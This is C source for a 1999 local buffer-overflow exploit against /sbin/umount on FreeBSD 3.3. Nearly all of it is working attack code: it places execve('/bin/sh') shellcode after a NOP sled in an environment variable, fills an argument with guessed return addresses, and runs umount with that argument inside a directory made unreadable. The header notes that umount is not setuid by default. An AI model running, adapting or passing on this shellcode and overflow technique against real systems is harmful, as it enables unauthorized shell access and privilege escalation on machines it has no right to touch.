FreeBSD 3.3 /sbin/umount exploit.
c72ade93bd2e85828e67454faf5440e0cfe5b1c3a5790d0af0f11707b19a77e9
/*
*
* (c) 1999 babcia padlina ltd. / buffer0verfl0w security(b0f.morphed.net)
* <babunia@FreeBSD.lublin.pl>
*
* FreeBSD 3.3 /sbin/umount exploit.
*
* NOTE: umount is NOT installed suid by default.
*
*
*
*/
#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>
#define NOP 0x90
#define OFS 1800
#define BUFSIZE 1024
#define ADDRS 1200
#define DIR "babcia padlina ltd."
long getesp(void)
{
__asm__("movl %esp, %eax\n");
}
int main(argc, argv)
int argc;
char **argv;
{
char *execshell =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
char *buf, *p;
int noplen, i, ofs;
long ret, *ap;
if(!(buf = (char *)malloc(BUFSIZE+1)))
{
perror("malloc()");
return -1;
}
if (argc > 2)
ofs = atoi(argv[1]);
else
ofs = OFS;
noplen = BUFSIZE - strlen(execshell);
ret = getesp() + ofs;
memset(buf, NOP, noplen);
buf[noplen+1] = '\0';
strcat(buf, execshell);
setenv("EGG", buf, 1);
if(!(buf = (char *)malloc(ADDRS+1)))
{
perror("malloc()");
return -1;
}
p = buf;
ap = (unsigned long *)p;
for(i = 0; i < ADDRS / 4; i++)
*ap++ = ret;
p = (char *)ap;
*p = '\0';
fprintf(stderr, "RET: 0x%x len: %d\n\n", ret, strlen(buf));
chdir(getenv("HOME"));
chmod(DIR, 0755);
rmdir(DIR);
mkdir(DIR, 0755);
chdir(DIR);
chmod(".", 0);
execl("/sbin/umount", "umount", buf, 0);
return 0;
}